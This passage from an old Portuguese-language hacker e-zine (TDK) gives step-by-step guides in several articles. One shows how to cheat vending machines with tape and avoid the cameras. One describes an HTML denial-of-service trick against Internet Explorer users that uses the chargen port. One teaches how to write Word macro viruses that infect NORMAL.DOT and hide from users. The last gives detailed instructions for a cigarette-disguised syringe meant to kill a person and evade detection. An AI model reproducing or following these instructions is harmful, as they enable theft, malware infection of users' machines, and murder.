aeroportos, aquelas fitas transparentes. Nao confunda com isolante, por que sao diferentes. Nao sei o nome correto mas creio que voce ja saiba de qual estou falando. Se usar a fita isolante nao funcionara por que ela e' muito fraca. -> Agora coloque a nota em uma mesa como se voce fosse a colocar na maquina. _____________________________________ ||-----------------------------------|#################### <- direcao da || Banco bla bla dbdb, 1 |#################### <- nota || o,o db |#################### <- na maquina || - d |### Fita Adesiva ### <- de bebidas || . '. |#################### || ###|REAIS\ (o) |#################### ||___________________________________|#################### ------------------------------------- Isso ai', tudo fica assim na mesa. Agora coloque a fita na seguinte posicao sobre a nota e fixe com outra parte da fita por baixo: _____________________________________ ||--------------------######################################################### <- direcao da || banco bla bla ################### Fita Adesiva ######################### <- nota || ################### Exatamente ######################### <- na maquina || ################### no meio ######################### <- de bebidas || ################### da nota ######################### || ###|REAIS\ ######################################################### ||____________________######################################################### ------------------------------------- { 60 a 75 cms } Tenha certeza de que voce deixou de 60 a 75 cms de fita depois da nota. .------------------. | Fazendo Funcionar `--------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Eu fiz isso com uma nota de um real, mas se voce quiser usar de valor maior, problema seu, quem se fode e' voce. Agora coloque a nota, mas segure na ponta da fita. Algumas maquinas sao muito fortes e se voce segurar no meio da fita a maquina pode rasgar sua nota. Agora que a maquina ja engoliu a nota toda, comece a puxar a nota pra fora. Mas faca isso quando a maquina ja tiver engolido a nota mas nao terminado o processo, senao voce danca. Puxe a nota nao muito rapidamente, mas tambem nao muito lentamente. Faca em uma forca uniforme. Voce deve ouvir um *CLAP*, o que significa que voce fez tudo ok. Se voce nao ouvir e' porque voce fez tudo errado animal! Mas se voce ouviu o *CLAP*, escolha uma bebida, e caso a maquina de troco, pegue o troco. ATENCAO Muitas das maquinas de bebidas sao vigiadas por cameras escondidas. Observe bem o lugar onde voce vai agir para nao dar erro nenhum. Tambem nao escolha um lugar com muito volume de gente passando por perto. A melhor hora de agir e' entre as 2:00am e as 4:00am. Se voce pegar muita bebida e nao souber o que fazer, venda a um preco bem baixo. Mas nao venda onde voce as pegou. So' isso... []'z Cacaio Cacaio@DeathKnights.com `'`'`' `'`'`'`'`'`'`'`'`'`'`'` -=[ 11 ]=- .------------------------. | HTML DoS (simples d+) \__________________________________________________ `----------------------------------------------------------------------------' by Cacaio Muitos sistemas rodam um servico chamado 'chargen' na porta 19. Ele simplesmente gera uma serie de caracteres interminaveis. Se um usuario do Internerd Exploder ou do Lynx se conectar ao chargen tentando ver um arquivo, abrir uma url ou sei la', simplesmente se conectar, o browser pensara' que esta vendo um arquivo de tamanho infinito. Isso faz a linha telefonica cair se o usuario estiver usando o IE, e deixa o linux muito mais lento se voce tentar se conectar, por falta de memoria. Uma url como http://localhost:19 poderia causar os danos a um sistema que esta rodando o lynx. Mas se voce killar o chargen, nao tem problema, pois os caracteres sao gerados em altissima velocidade, e quando voce killar, os caracteres ja foram enviados a muito tempo. O servico chargen serve, na verdade, para outros usos na seguranca de sistemas, e pode ser desligado em sistemas normais. Aqui vai um simplissimo codigo HTML que funciona para fazer o DoS no Internerd Exploder. Onde 'maquina.com.chargen.ligado' e' qualquer maquina na rede que rode o chargen. Se voce nao quiser que usuarios de IE visitem sua pagina, e voce ainda quer se divertir com ele, insira este simples codigo. No lynx aparece somente um '[INLINE]', e nao causa nenhum tipo de problemas. Simples mas divertido. Cacaio Cacaio@DeathKnights.com `'`'`' `'`'`'`'`'`'`'`'`'`'`'` -=[ 12 ]=- .-------------------. | VIRUS DE MACRO \_______________________________________________________ `----------------------------------------------------------------------------' by Milly Ola pessoal, desculpe a furada no zine passado, acontece que eu tive uns problemas com minha conexao e acabei ficando sem nem mesmo acessar e- mail; mas ja estamos de volta. Agora eu tenho uma materia especialmente para voces; ja esta caindo em desuso devido ao avanco dos anti-virus mas ainda pode ser util dada a teoria que tem por tras disso tudo, nesse zine veremos algo sobre: VIRUS DE MACRO. Isso e muito bom para novatos, uma vez que e extremamente facil de implementar e traz resultados extremamente rapidos o que incentiva muito o aprofundamento desse assunto. Basicamente irei abordar como elaborar um virus para macro do Word 6.0 e 7.0, talvez eu traga um update para a versao 8.0 quando tiver mais chances de estuda-la. A diferenca entre a versao 6.0 e 7.0 e o nome de algumas funcoes e comandos, esse e o mesmo problema encontrado no caso de linguagens diferentes do Word (Espanhol, Ingles, Portugues...). Ainda nao tive tempo de avaliar totalmente a linguagem de macro do Word 8.0, mas sei que nao se trata de WordBasic, mas sim de VBA; isso significa que todos os programas do Office 97 estao habilitados a executar a mesma macro, ou seja em breve teremos virus de Excel, Access, PowerPoint... Porem foram inseridas umas funcoes que evitam a proliferacao de virus, mas isso nao e coisa para se preocupara pois como sabemos se e microsoft deve haver um jeito de infectar. .--------------------. | TEORIA BASICA `------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Existem algumas condicoes basicas para que possamos elaborar um virus: 1. Deve ser possivel executar funcoes e/ou procedimentos sem o conhecimento nem autorizacao expressa do usuario. 2. Deve haver um hospedeiro atraves do qual o virus se propagara de uma maquina a outra (afinal, ninguem vai te fazer o favor de copiar o virus pra outra maquina por voce). 3. O virus deve se manter ativo sem o conhecimento do usuario, ate mesmo dos pouco mais avancados. .------------------------. | RESOLVENDO OS PROBLEMAS `--------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - 1. Quem conhece virus diz logo de cara: "O Word foi feito para que se possa implementar virus de macro.". E incrfvel a facilidade com que se obtem recursos extremamente uteis para a elaboracao de virus no WordBasic. As funcoes basicas do Word podem ser modificadas para atender as necessidade dos usuarios, Portanto se voce criar uma funcao com o mesmo nome de uma funcao ja existente, nesse caso voce na verdade editar essa funcao (experimente ArquivoAbrir, por exemplo). 2. E como eu digo: "Se eh Microsoft, eh possevel infectar!", o Word tem um tipo de documento que pode carregar os codigos de WordBasic de uma maquina para outra, sao os chamados Modelos. E precisa explicar qual a melhor maneira de se transportar uma coisa entre um Word e Outro? E atraves de arquivos. Basta apenas modificarmos os Documentos para se tornarem Modelos. Alem disso existe uma funcao chamada CopiarMacro, com essa macro nem e necessario abrir o arquivo para infecta-lo. 3. Existem varias maneira de se evitar que o usuario te perceba dentro do Word, uma delas e essencial: Seu virus nao pode gerar nenhuma caixa de dialogo ou mensagem de erro (o que ja encontrei em diversos virus por ai). Outra coisa muito boa e evitar que o usuario chame de alguma forma a caixa de dialogo que mostram as macros definidas, no inicio os virus simplesmente eliminavam o item do menu, eu pessoalmente acho isso pouco aconselhavel pois um usuario um pouco mais experiente vai notar a diferenca no menu. No MPad (virus que eu mesma fiz) eu redefini a funcao FerramMacros de forma que a funcao nao chamava a caixa de dialogo, isso resolve dois problemas: Se o usuario for experiente ele pode notar rapidamente a modificacao no menu (o que nao ocorre); se o alguem vier .------------------. | INFECTANDO O WORD `--------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Todo o Word tem um diretorio onde ele armazena os Modelos e la dentro sempre existem um Modelo chamado NORMAL.DOT. Esse Modelo sempre e carregado no inicio do Word, portanto e extremamente importante contaminar esse arquivo, e como contaminar os arquivos de inicializacao do sistema operacional. O Modelo NORMAL.DOT pode ser referenciado na funcao MacroCopiar atraves do identificador 'Global', assim voce deve incluir na funcao AutoOpen, que se executa toda a vez que um documento e aberto uma sequencia de comandos que copie suas macros para dentro do 'Global'. .--------------------. | INFECTANDO ARQUIVOS `------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - A tecnica que voce vai utilizar para infectar os arquivos vai do seu estilo. Uns gostam de ser mais violentos outros sao mais discretos mas a dica e utilizar o maior numero de funcoes que manipulam nomes de arquivos que voce descobrir. Outra dica e utilizar a funcao ArquivoNovoPadrao para infectar os arquivos novos que o word cria, assim se o cara te tirar do NORMAL.DOT vc ainda continua no documento ativo, mesmo que tenham acabado de iniciar o Word. .--------------------. | CONFLITO DE VERSOES `------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Um dos problemas de praticamente qualquer virus e o conflito de versoes, deve-se tomar cuidado na elaboracao do primeiro virus para que ele nao venha a infectar versoes posteriores do seu virus. Para isso eu fiz uma funcao cujo nome seguia um padrao: MPadxx. Onde xx e o numero da versao, assim eu pego o nome da funcao divido em duas partes e verifico qual eh a versao, dessa forma versoes mais velhas ficam sao sobre-escritas pelas mais novas. .----------------------------. | FEITICO CONTRA O FEITICEIRO `----------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Outro Problema a ser resolvido e evitar de cair na sua propria armadilha. O virus quanto mais bem feito mais dificil de se livar dele, e isso inclui voce proprio e todo mundo envolvido no projeto. Porem um bom projeto preve esse caso, eu resolvi esse problema criando uma macro cujo nome eu nao vou revelar aqui (voce achou que eu iria entregar o ouro...) que evita que o virus se copie dentro do teu NORMAL.DOT. Para todos os efeitos sempre mantenha em mao um backup do NORMAL.DOT, mas nunca utilize o mesmo nome, sempre procure utilizar ate mesmo outra extensoes. E isso ai pessoal. Um virus de macro prontinho pra ser usado, so espero que voces facam um bom uso dele, principalmente no que diz respeito a essa nova galera que vem vindo ai pra detonar. Ate a proxima tdk! ;) Milly MillyPad@hotmail.com `'`'` `'`'`'`'`'`'`'`'`'`' -=[ 14 ]=- .--------------------. | A arte de matar \______________________________________________________ `----------------------------------------------------------------------------' by Cacaio Aqui voce vai aprender a matar. Nao me responsabilizo se voce tentar fazer o que esta descrito aqui, pois com certeza resultara' em morte. Esta materia e' a que mais pode causar danos de todas as materias ja publicadas em todos os numeros de qualquer zine brasileiro, e dificilmente havera' outra similar. Portanto, tenha certeza do que voce vai fazer. Se fizer o que esta descrito aqui e der rolo pra voce, nao olhe pra mim. Eu nao quero que voce faca o que ensinarei, e' apenas para fins educativos, tais como mostrar que com materiais caseiros se pode causar danos muito serios e irreversiveis. Este texto nao pode ser encontrado em nenhum outro local na rede ou em qualquer livro ou publicacao, e' totalmente inedito. Tanto este texto quanto toda esta zine *NAO* pode ser publicada sem autorizacao. O que ensinarei voce a fazer e' a criar uma injecao letal, que fica camuflada como um cigarro e e' indolor. .----------------------. | Materiais necessarios `---------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - Toxico mortal como por exemplo, ar, cianidio, ou qualquer outro tambem serve Seringa grande caso penetracao na pele seja necessaria Seringa com 5cm ou menos com 2,5cm de agulha. Seringa a qual cabe perfeitamente dentro de um cigarro vazio. Cola forte Cigarros grandes .---------------------. | Preparando a seringa `----------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - 1- Separe as duas partes da seringa que voce ira usar para fazer o servico. 2- Quebre a agulha na seringa maior. Agora coloque cola na base das seringas menores. Coloque a agulha da seringa maior por cima da agulha da seringa menor. 3- Corte as 'abas' da seringa. 4- Agora pegue a parte que voce empurra na seringa e corte o topo, e tambem o corpo para que fique somente uma peca com 4.5cm no total. 5- O que voce deve ter agora e uma daquela parte que voce empurra na seringa que seja apenas uma com 4.5cm no total(voce ja fez isto), e uma agulha que tem mais ou menos 3cm. O conjunto total deve ser de 3 pecas que todas montadas dao no total no maximo 10cm para caber dentro do cigarro. .---------------------. | Preparando o cigarro `-----------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - 1- Remova o filtro do cigarro girando ele, e jogue o papel fora. O papel que sobra deve ter 1.2cm mais ou menos, o papel que fica junto da parte do filtro. Tente nao danificar. 2- Agora tire o filtro com uma pinca de dentro do papel. 3- Agora pegue outro cigarro, jogue o fumo fora, tire o filtro e guarde o papel. 4- O que voce deve ter agora e' um conjunto completo para montar um cigarro, mas o conjunto todo vazio. 5- Cole o papel do cigarro na parte do filtro e deixe secar. .----------------------. | Preparando o conjunto `----------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - 1- Coloque o toxico dentro do corpo da seringa, ja com a agulha. 2- Deixe a parte que voce impurra puxada. 3- Coloque a seringa dentro do cigarro com a parte que voce impurra encostada no filtro. 4- Preencha o espaco restante do cigarro com fumo. .----------. | Como Usar `---------------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - 1- Acenda o cigarro. Nao havera problemas, pois a agulha estara' a uma distancia que dara para o cigarro queimar mais ou menos 1 minuto sem problema algum. 2- Ande por perto da vitima e o queime/injete nele empurrando a parte acesa do cigarro armado contra ele. Como a parte que empurra o liquido esta do lado do filtro, nao havera problema para voce. 3- A vitima pensara que foi apenas uma queimadura de cigarro, te xingar e continuar andando. Em pouco tempo morrera'. .--------------. | Notas `-----------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - 1- Voce tem que tentar fazer isto varias vezes, ate que o tamanho das seringas seja o exato. Nao e' facil acertar. 2- Nao use muito liquido, ou a vitima percebera' que algo de errado esta acontecendo antes de morrer. 3- Nunca jogue fora o material perto de onde voce atacou a vitima. 4- Destroia o material totalmente antes de jogar fora, e jogue no lixo organico para que ninguem perceba nada. 5- Tome muito cuidado para nao te pegarem. 6- A queimadura cuidara' da dor, entao ele/ela nao sentira a picada da agulha. 7- A pessoa morrera' entre 20 e 30 minutos, nao mais do que isto. 8- Se voce nao tiver toxico algum, nao coloque nada na seringa. .------------------. | Toxicos para usar `-------------------------------------------. `=================-=-====--==-=-=-===----==---=-=---=-=--- -- - - 1- O toxico mais simples para se usar e' o ar. Uma bolha de ar no cerebro pode causar a morte e *nao* existe nenhum meio de saber como foi a morte em autopsias ou qualquer exame, a nao ser que percebam a queimadura junto ao buraco da seringa. 2- Se vira e inventa algo! Desinfetante, qualquer coisa! Cacaio Cacaio@DeathKnights.com `'`'`' `'`'`'`'`'`'`'`'`'`'`'` -=[ 14 ]=- .-----------. | FEW WORDS \_______________________________________________________________ `----------------------------------------------------------------------------' by Cacaio Quer saber quem sao os membros do TDK? De uma olhada em nossa page! http://www.DeathKnights.com Se voce quiser se tornar um membro do TDK, esqueca, ja temos muitos membros. Voce usa Linux e nao tem ICQ? Acha o ICQJava muito lento? Entao visite http://www.deathknights.com/micq. Um cliente ICQ muito bom que pode ser executado na shell mesmo. A partir do dia 15/09 estara', no endereco citado acima, a versao em ingles. Aos poucos disponibilizaremos as versoes em Portugues(BR) e Espanhol. O e-mail do criador do micq e' mds1281@rit.edu. As traducoes serao feitas com a autorizacao do mesmo. Se voce quiser mandar um e-mail dizendo o que achou do zine, dar su- gestoes, reclamar, elogiar, meter o pau, colocar alguma materia, este- ja a vontade. Se voce tem um zine BOM *OU* um programa e queira disponibiliza-lo para os outros, mande-nos um e-mail. Voce podera' hospeda-lo em http://www.deathknights.com/SuaEscolha gratuitamente. Hey, nao vem pensando que isso aqui e' GeoCities, Xoom ou Tripod nao, antes iremos avaliar seu pedido. AVISO NOVAMENTE: O TDK (The Death Knights) nao visa nenhum fim lucrativo. Qualquer uso das informacoes contidas aqui nao e de nossa responsabilidade. Se voce fizer algo descrito e se der mal, problema seu. Nos ensinamos, mas nao pedimos para usarem o conhecimento adquirido com este zine. Ate o proximo TDK! ___________________________________TDK______________________________________ ---------------------------------------------------------------------------- Criticas? Sugestoes? tdk@DeathKnights.com